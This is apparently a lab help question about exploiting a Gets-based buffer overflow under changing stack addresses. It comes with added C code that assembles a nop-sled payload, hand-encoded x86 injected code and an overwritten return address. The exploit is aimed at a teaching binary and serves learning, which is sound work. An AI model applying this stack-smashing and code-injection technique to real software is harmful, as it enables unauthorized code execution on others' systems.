Need to exploit buffer overflow. Can't figure out how to uncorrupt the stack after executing exploit code?

Basically the function I am exploiting is this:

    int getbufn() {
        char buf[512];
        Gets(buf);
        return 1;
    }

When I run the main program the function executes 5 times, and each time the location of buf changes and so does the location of %ebp. What I am supposed to do is place a specific hex value, let's say 0xFFFFFFFF, into a variable, and the main program checks each time to see if that variable is there. If it is, it executes again until all 5 times are done and the program exits quietly.

The problem I am having is that right before the check for the hex value there is a check for another value that is constant, let's say 0x12345678. If I have corrupted 0x12345678 and it's not there, the program explodes on me.

I have figured out that 0x12345678 is stored in -0x10(%ebp), so I know it is based off %ebp, and I know the address of %ebp each time, but I can only get the exploit to work the first time. I do this by basically nopsled-ing 496 bytes and then having this machine code in byte format:

    mov  $0xFFFFFFFF, %eax
    movl $<address old ebp>, %ebp
    push $<correct return address in function main>
    ret

which ends up being 5 words and a byte (for ret) long, which I fill out with 0x313131 to make it 6 words long. At this point my exploit string is 520 bytes long, which is exactly how far the buffer is below %ebp, and so I add on the address of old ebp and an address somewhere inside my nopsled, overwriting the current value at %ebp as well as the return address for getbufn.

The problem is when the program executes a 2nd time %ebp is at an address 0x10 lower than its previous address, so my way of uncorrupting %ebp doesn't work and main detects that 0x12345678 is not at -0x10(%ebp). How do I uncorrupt %ebp?
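The following is an added worked example, not part of the question above or of the lab it comes from. It builds the 528-byte overflow string implied by the layout the question describes (512-byte buf sitting 520 bytes below the saved %ebp, saved %ebp at buf+520, getbufn's return address at buf+524) and adds the two checks that usually decide whether such a string survives several runs. The one change from the question's approach is in the injected code: instead of loading a hard-coded old %ebp (which only matches the run it was copied from), it recomputes %ebp from %esp with `lea N(%esp),%ebp`. This rests on the assumption that the whole stack is shifted by the same amount on each run (consistent with both buf and %ebp moving), so the distance between %esp after getbufn's `ret` and the caller's %ebp stays fixed even though the absolute addresses do not. The displacement N, the return address, the cookie and the sled address used here are hypothetical placeholders; the real ones have to be read from gdb for the actual binary.

```c
/* Added example (not from the question or the lab): builds the 528-byte
 * overflow string for the frame layout described above and checks it.
 * 32-bit x86 machine code is emitted as bytes; it is not executed here. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define BUF_SIZE    512
#define EBP_OFFSET  520                 /* buf -> saved %ebp, from the question */
#define PAYLOAD_LEN (EBP_OFFSET + 8)    /* + saved %ebp slot + return address  */

typedef struct {
    uint32_t cookie;        /* value to leave in %eax, e.g. 0xFFFFFFFF          */
    int      ebp_from_esp;  /* N in lea N(%esp),%ebp; ASSUMPTION, read from gdb */
    uint32_t ret_addr;      /* where to "return" inside the caller (hypothetical) */
    uint32_t sled_target;   /* an address inside buf's nop sled (hypothetical)   */
} exploit_params_t;

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Emits the injected code into out; returns its length (15) or 0 if N
 * does not fit the disp8 form of lea. */
size_t emit_code(uint8_t *out, const exploit_params_t *p)
{
    size_t n = 0;
    if (p->ebp_from_esp < -128 || p->ebp_from_esp > 127)
        return 0;
    out[n++] = 0xB8;                                   /* mov $cookie,%eax    */
    put_le32(out + n, p->cookie); n += 4;
    out[n++] = 0x8D; out[n++] = 0x6C; out[n++] = 0x24; /* lea N(%esp),%ebp    */
    out[n++] = (uint8_t)(int8_t)p->ebp_from_esp;
    out[n++] = 0x68;                                   /* push $ret_addr      */
    put_le32(out + n, p->ret_addr); n += 4;
    out[n++] = 0xC3;                                   /* ret                 */
    return n;
}

/* Fills out[] with: nop sled | code | saved-%ebp slot | return address.
 * Returns PAYLOAD_LEN, or 0 if cap is too small or the code was rejected. */
size_t build_payload(uint8_t *out, size_t cap, const exploit_params_t *p)
{
    uint8_t code[16];
    size_t code_len, sled_len;
    if (cap < PAYLOAD_LEN) return 0;
    code_len = emit_code(code, p);
    if (code_len == 0) return 0;
    sled_len = EBP_OFFSET - code_len;          /* 505 bytes of nop (0x90)      */
    memset(out, 0x90, sled_len);
    memcpy(out + sled_len, code, code_len);
    put_le32(out + EBP_OFFSET, 0x41414141);    /* saved %ebp slot: don't care, */
                                               /* the lea rebuilds %ebp        */
    put_le32(out + EBP_OFFSET + 4, p->sled_target);
    return PAYLOAD_LEN;
}

/* Gets() stops at '\n', so a 0x0a byte anywhere truncates the string. */
int payload_is_newline_free(const uint8_t *buf, size_t len)
{
    return memchr(buf, '\n', len) == NULL;
}

/* True if jumping to sled_target lands in the sled when buf sits at buf_addr;
 * aiming at the middle of the sled tolerates buf moving in either direction. */
int sled_covers(uint32_t buf_addr, uint32_t sled_target, size_t sled_len)
{
    return sled_target >= buf_addr && sled_target < buf_addr + sled_len;
}

int main(void)
{
    /* All four values are hypothetical; take the real ones from gdb. */
    exploit_params_t p = { 0xFFFFFFFFu, 0x28, 0x08048500u, 0x55683100u };
    uint8_t payload[PAYLOAD_LEN];
    size_t len = build_payload(payload, sizeof payload, &p), i;
    printf("len=%zu newline_free=%d\n", len, payload_is_newline_free(payload, len));
    for (i = 0; i < len; i++)
        printf("%02x%s", payload[i], (i % 16 == 15) ? "\n" : " ");
    printf("\n");
    return 0;
}
```

The nop sled absorbs the per-run movement of buf (any sled address that still falls inside the 505 nop bytes works), while the `lea` absorbs the movement of the caller's %ebp; together they remove the two hard-coded addresses that made the string run-specific. The saved-%ebp slot is filled with a don't-care value because the injected code overwrites %ebp anyway.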